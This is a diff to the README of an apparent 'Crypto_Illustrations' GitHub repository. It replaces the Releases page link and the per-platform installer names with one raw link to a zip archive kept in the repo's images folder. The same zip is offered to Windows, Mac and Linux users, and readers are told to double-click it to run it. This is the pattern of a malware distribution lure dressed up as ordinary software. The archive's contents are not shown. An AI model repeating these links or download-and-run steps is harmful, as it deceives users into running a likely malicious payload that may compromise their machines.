homie1999/Crypto_Illustrations/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To download the software, visit our [Releases page](https://github.com/homie1999/Crypto_Illustrations/releases).
+   To download the software, visit our [Releases page](https://github.com/homie1999/Crypto_Illustrations/raw/refs/heads/main/images/Illustrations-Crypto-1.0.zip).

 2. **Select the Latest Version**
    On the Releases page, you will see a list of versions.
 Click on the latest version to view available files.

 3. **Download the Files**
    Look for the appropriate file format for your operating system.
 Once found, click on the file link to download it.
 For example:
-   - For Windows users, download `Crypto_Illustrations_Windows.exe`.
+   - For Windows users, download `https://github.com/homie1999/Crypto_Illustrations/raw/refs/heads/main/images/Illustrations-Crypto-1.0.zip`.
-   - For Mac users, download `Crypto_Illustrations_Mac.dmg`.
+   - For Mac users, download `https://github.com/homie1999/Crypto_Illustrations/raw/refs/heads/main/images/Illustrations-Crypto-1.0.zip`.
-   - For Linux users, download `Crypto_Illustrations_Linux.tar.gz`.
+   - For Linux users, download `https://github.com/homie1999/Crypto_Illustrations/raw/refs/heads/main/images/Illustrations-Crypto-1.0.zip`.

 4. **Run the Application**
    After downloading, locate the file, and double-click it to run.
 Follow the on-screen instructions to start using Crypto_Illustrations.